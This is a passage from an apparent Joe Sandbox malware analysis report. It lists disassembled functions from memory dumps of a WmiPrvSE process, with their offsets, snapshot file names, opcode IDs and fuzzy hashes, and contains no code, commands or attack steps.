                                                                                                                            • Instruction Fuzzy Hash: 37316231A0DA4E8FDB49EB64C864AB97BF1FF5A300B0505FBD009D71A6DB38A940CB50
                                                                                                                            Function 00007FFD9B8D1675 Relevance: .1, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b6eb354c97bc674aab07798903681c2885ff2dc6e6e0408fef2bd854a50a5d58
                                                                                                                            • Instruction ID: d39a3d5deb04b1f044f25587417280c91fc72eec4d8ac57e2d08a712baf6fe43
                                                                                                                            • Opcode Fuzzy Hash: b6eb354c97bc674aab07798903681c2885ff2dc6e6e0408fef2bd854a50a5d58
                                                                                                                            • Instruction Fuzzy Hash: 2511C611B0FAD90FDB69A77D94291647BE1DFEA21070A43FBC089CB1A3DC1959868351
                                                                                                                            Function 00007FFD9B8B7E67 Relevance: .1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f0e7846c7d26ee1d107b15ce2dc8d8cc5860800ff28a472f19ee1fc77c383ab2
                                                                                                                            • Instruction ID: c3079537b3a29aa539061671c63742951d4d7567a152e821ad31aab9616f3617
                                                                                                                            • Opcode Fuzzy Hash: f0e7846c7d26ee1d107b15ce2dc8d8cc5860800ff28a472f19ee1fc77c383ab2
                                                                                                                            • Instruction Fuzzy Hash: 8E215070E0A92E8FEB64DB64C474BBD72A1EF58300F1501B5C40DD76E5DE38AA41CB80
                                                                                                                            Function 00007FFD9B8B09E5 Relevance: .1, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d6ff613d1e1011a5c0b9e028a654a43642ecd302dd9996cf791869d6a70463dd
                                                                                                                            • Instruction ID: 8a0c196d891c47c4577d0cf70c6fb9d66d97f202bf500e4b614efcba270592ea
                                                                                                                            • Opcode Fuzzy Hash: d6ff613d1e1011a5c0b9e028a654a43642ecd302dd9996cf791869d6a70463dd
                                                                                                                            • Instruction Fuzzy Hash: 5911C672B1952A8FD715BBBDE4948E833A0FF49325B4101B7D009CB0A2DA296482CB90
                                                                                                                            Function 00007FFD9B8B09D5 Relevance: .1, Instructions: 53COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6998047b653b12c5cd25a5e7405e64815440c3f2acde7e22eaa05ae33ce18766
                                                                                                                            • Instruction ID: b0af7ae330328125ce67311817ef743c200832f512138d71e5108e6c747525e8
                                                                                                                            • Opcode Fuzzy Hash: 6998047b653b12c5cd25a5e7405e64815440c3f2acde7e22eaa05ae33ce18766
                                                                                                                            • Instruction Fuzzy Hash: 8501D671B1851ACFD715FF6DE8948A833A0FF49335B5101B7D04ACB0B2EA39A495CB50
                                                                                                                            Function 00007FFD9B8A0BB5 Relevance: .1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 711c08e7c814b4be97d73f9ca9ff6a119cb5e5c776dfc9583cb40676b33f643d
                                                                                                                            • Instruction ID: decc4f43d94fe0a320b31720b61fd7784de3a6915eecf42466f260f9639cabaf
                                                                                                                            • Opcode Fuzzy Hash: 711c08e7c814b4be97d73f9ca9ff6a119cb5e5c776dfc9583cb40676b33f643d
                                                                                                                            • Instruction Fuzzy Hash: DF01D861A1D42685D71A33ACF9654EC3750DF4632DB0942F3D01D8A4E3AE986486D365
                                                                                                                            Function 00007FFD9B8A0C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7e0197b423aac29a8e68c7a9dc740efbd669bc43ca0ac69d60c9dfd5e7211c93
                                                                                                                            • Instruction ID: da1c38f36c2f6ea7c38bcd14971652312b5d8201e85c1661db88265c357583c6
                                                                                                                            • Opcode Fuzzy Hash: 7e0197b423aac29a8e68c7a9dc740efbd669bc43ca0ac69d60c9dfd5e7211c93
                                                                                                                            • Instruction Fuzzy Hash: 1A11A531F1E68D9FE712DBA4886009D7BB0EF56710F0641F7C048DB2E2D938664A8790
                                                                                                                            Function 00007FFD9B8DE2C3 Relevance: .0, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5159933dfefaf47225735317472b7d43f4ec2b3bec768c63c4b902c8bd307a14
                                                                                                                            • Instruction ID: e82c856f25dcd7f07228c7d9b95a1c45ac93833607f441b166552b8d83718efb
                                                                                                                            • Opcode Fuzzy Hash: 5159933dfefaf47225735317472b7d43f4ec2b3bec768c63c4b902c8bd307a14
                                                                                                                            • Instruction Fuzzy Hash: 60015E31F0941E8BEFA8AA98D4997BD73E1EB98312F420337D00DC3594DA29A9858780
                                                                                                                            Function 00007FFD9B8A0C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7b77214055d9c630a3c227829d3bfced16b92dd6a16533b2c6c4e56c9887dbca
                                                                                                                            • Instruction ID: fc1ccfb2be374b93104792a57320952051fde2eba8a51273795ab39ded188bd9
                                                                                                                            • Opcode Fuzzy Hash: 7b77214055d9c630a3c227829d3bfced16b92dd6a16533b2c6c4e56c9887dbca
                                                                                                                            • Instruction Fuzzy Hash: 67018031E1E28D9FE722DBA488A049D7BB0EF16710F1641F7C048DB2E2E93866468791
                                                                                                                            Function 00007FFD9B8DBC80 Relevance: .0, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 92d977b4cfb1d999cedb816ece40b0d78f273b1cafbce62ff296f5f0c9974ce0
                                                                                                                            • Instruction ID: dafd6e0f01c19560ea6adb8b4deb7c890ed76fd541669ebe9544b7ff08ea8170
                                                                                                                            • Opcode Fuzzy Hash: 92d977b4cfb1d999cedb816ece40b0d78f273b1cafbce62ff296f5f0c9974ce0
                                                                                                                            • Instruction Fuzzy Hash: 57F05461B09D4E8BF698A75844667F472C6FBDC311F55437BD40CCB1A2DE2829815741
                                                                                                                            Function 00007FFD9B8DB4F9 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 03ad6fefa67d258c155cc0bdb3dbf1b3347caa660430176b74fee4fb662db6b0
                                                                                                                            • Instruction ID: 729e1ae1e1a881212af883c8af891fd8ec01dc6d991c5af251f34ace4170035a
                                                                                                                            • Opcode Fuzzy Hash: 03ad6fefa67d258c155cc0bdb3dbf1b3347caa660430176b74fee4fb662db6b0
                                                                                                                            • Instruction Fuzzy Hash: E4F02B217597C80FC719563D58650A17FF1CBAB10234A02EBE086C72A7ED14EC468741
                                                                                                                            Function 00007FFD9B8A696B Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b42807b7212ebbfb889a1e5ccf6e71e1244f3f835f59a3268c67c4abf91bc575
                                                                                                                            • Instruction ID: 77100362e80831537b178b79094d0b68bef1a7a40e2c347096ceaf3c6b0e00a7
                                                                                                                            • Opcode Fuzzy Hash: b42807b7212ebbfb889a1e5ccf6e71e1244f3f835f59a3268c67c4abf91bc575
                                                                                                                            • Instruction Fuzzy Hash: E7F0E1759089188FDF54EF04C8A4E99B3E1FBA9315F054199D40DD7264DA34AE84CF81
                                                                                                                            Function 00007FFD9B8B42E8 Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 30b6fa0503a1d9a1f0c896a7e406a7f97b560a4207146a1f327746cf350d4a26
                                                                                                                            • Instruction ID: 02487238adc7ca39cf326f42607e52ce6bbfd2a6c64a6721a7696bbc04a2c5e8
                                                                                                                            • Opcode Fuzzy Hash: 30b6fa0503a1d9a1f0c896a7e406a7f97b560a4207146a1f327746cf350d4a26
                                                                                                                            • Instruction Fuzzy Hash: 2BF04F71E1491E8FEB14DF84D8559BD73B1FB94310F00422ED415D3298DE7469018F80
                                                                                                                            Function 00007FFD9B8D538C Relevance: .0, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4991f0ecc664a1e1dd6b17d1eaa09c3121defdae98d38cdf90370d3bb2fde26c
                                                                                                                            • Instruction ID: 5d567c09a9d465bcafa00597be5a9469de427c05f1512996987e814d2130d70f
                                                                                                                            • Opcode Fuzzy Hash: 4991f0ecc664a1e1dd6b17d1eaa09c3121defdae98d38cdf90370d3bb2fde26c
                                                                                                                            • Instruction Fuzzy Hash: 80F05B70B1DA5D5BEB68EB5C98512A872E1FB9C300F1503FEE05DC3296CE3479458B45
                                                                                                                            Function 00007FFD9B8D84C5 Relevance: .0, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9b4818441bb047532442b5f54e6e41404568fca61e7b8d99f10e9bd805115039
                                                                                                                            • Instruction ID: 1d418e1a5b1906adc4a85b2929252656b6b38a98297aed27ce0d5a9ae8f6d264
                                                                                                                            • Opcode Fuzzy Hash: 9b4818441bb047532442b5f54e6e41404568fca61e7b8d99f10e9bd805115039
                                                                                                                            • Instruction Fuzzy Hash: F0E0CD3574A5490FD70D573C8C3546537A1DF9A11274A01B7C449CB1F3D919DD4A8341
                                                                                                                            Function 00007FFD9B8D9118 Relevance: .0, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4d0275d6bcf24f702fd4d4958a6770108acef89f7a41bb26c95134cf02eb245c
                                                                                                                            • Instruction ID: 5f387a8c8dee5b02a140068a4708c8dca45c5a1acf2bce117b1853ca7e2679bb
                                                                                                                            • Opcode Fuzzy Hash: 4d0275d6bcf24f702fd4d4958a6770108acef89f7a41bb26c95134cf02eb245c
                                                                                                                            • Instruction Fuzzy Hash: 93F0F830A0650ECBEB54EB94C8587EC73E1FB98315F104B6AC009A72A5DE7A6E45CB44
                                                                                                                            Function 00007FFD9B8B0A05 Relevance: .0, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2de8aa2cbc571330b34703cdcd018ace12e7a3e501408cbf63975b8add61c289
                                                                                                                            • Instruction ID: 3d5c08b6e20c4d0c1d6043f7d65f6551d989a4674142542adc55b3917beabd13
                                                                                                                            • Opcode Fuzzy Hash: 2de8aa2cbc571330b34703cdcd018ace12e7a3e501408cbf63975b8add61c289
                                                                                                                            • Instruction Fuzzy Hash: 2AE09A71B2991A8FD720EB2DD4D08B837B0FB88344B9102F3C404CB2B1D228A5A9CB51
                                                                                                                            Function 00007FFD9B8B5718 Relevance: .0, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be67ed34db126037345d8a2ac20c52ef1b636612b91b605e04b8578d0b83e27d
                                                                                                                            • Instruction ID: 9e4c759fe0b71b194a14a8b244e728e92deb7e35d5772c4efa38e066d732ccfa
                                                                                                                            • Opcode Fuzzy Hash: be67ed34db126037345d8a2ac20c52ef1b636612b91b605e04b8578d0b83e27d
                                                                                                                            • Instruction Fuzzy Hash: 9FD05E30B60A0D4B8B0CB62D8459470B3D1E7AA2067D45279D40BC2291ED25ECC68B84
                                                                                                                            Function 00007FFD9B8DAFD0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B8DB0A0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                            Function 00007FFD9B8A4F76 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 87fe40143c0fa8910b5aec366141b2326e95f287f33e0fb3ea6f95a5309640ea
                                                                                                                            • Instruction ID: 46f6a376f6fff4f5317d8799355413b17b3d516d9f904a2f30c480fb695b9e11
                                                                                                                            • Opcode Fuzzy Hash: 87fe40143c0fa8910b5aec366141b2326e95f287f33e0fb3ea6f95a5309640ea
                                                                                                                            • Instruction Fuzzy Hash: 8EE09221F0E64A8AFAB06390C4703BA22714F9DB00F1F017AD40EE71F2DD187E82C221
                                                                                                                            Function 00007FFD9B8DE459 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5381678aad851711da99e621336ef16b8d659c7d510f18956431cf5a0a3ce9b9
                                                                                                                            • Instruction ID: 87d7c052dd1149a2e0a2f4397ef23b579ad973e2439e286b32faab769d1846f7
                                                                                                                            • Opcode Fuzzy Hash: 5381678aad851711da99e621336ef16b8d659c7d510f18956431cf5a0a3ce9b9
                                                                                                                            • Instruction Fuzzy Hash: 13E0123554A3C08FCB0A9B3488A89803F70EE1721038A41EAC049CF1A3DA29894AC721
                                                                                                                            Function 00007FFD9B8DE4D9 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 577273b7a2dbf2aacd2f814190385b1e86cdb4f651b133a0d5963a3e390b8c29
                                                                                                                            • Instruction ID: 8b375992e797f3efd33a563a163c2b1a43db0f47e822fef212f0b6242934c7e2
                                                                                                                            • Opcode Fuzzy Hash: 577273b7a2dbf2aacd2f814190385b1e86cdb4f651b133a0d5963a3e390b8c29
                                                                                                                            • Instruction Fuzzy Hash: 6FE01A2194EBC04FCB1B9B3488698507F609E5721178A41EBC089CF5B3D5199849C701
                                                                                                                            Function 00007FFD9B8A0B92 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction ID: b48cd5f71409a24054d145006df8ef09d8d7bfd289156efe669d32a7515f1873
                                                                                                                            • Opcode Fuzzy Hash: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction Fuzzy Hash: E6D0A73166EA8E4FEB02B7B8DC5A4547FA0EF1F215FDA14E2D008CB5B2D5055999C701
                                                                                                                            Function 00007FFD9B8D2960 Relevance: .0, Instructions: 18COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                            Function 00007FFD9B8DC388 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                                                            • Instruction ID: 309e47e433405a5b9b99c9b524194f6c83b91d23d945c5ba201eb52c0fccb924
                                                                                                                            • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                                                            • Instruction Fuzzy Hash: B3D02230B51C040FCB0CB73888988303391EBAE20778201A9D00AC72B1D92ADC88C7C0
                                                                                                                            Function 00007FFD9B8D79D8 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                                                                                            • Instruction ID: d0e4225136479deed63028f637036e1f92e7d896ecc58e358f9dd311c558f2fe
                                                                                                                            • Opcode Fuzzy Hash: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                                                                                            • Instruction Fuzzy Hash: ABD02234B508040FC71CB73888588303391EBAE206B8101ADD00AC72B1D92ADC89C740
                                                                                                                            Function 00007FFD9B8D848C Relevance: .0, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8d1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ab9562f4afc654ad43cb676b16cd503151af6ef77b6da7b3baf5e01dc5b9db0a
                                                                                                                            • Instruction ID: d620ef0e61c72c91930608c5ed2f72f0e3011f333ae5a0fafaaca3d648404a38
                                                                                                                            • Opcode Fuzzy Hash: ab9562f4afc654ad43cb676b16cd503151af6ef77b6da7b3baf5e01dc5b9db0a
                                                                                                                            • Instruction Fuzzy Hash: 59D0A73194B5844FCB0A9B3584A8C607F50DF5A21474941EDC04A8F1B2D9259D49C700
                                                                                                                            Function 00007FFD9B8A1270 Relevance: .0, Instructions: 14COMMON
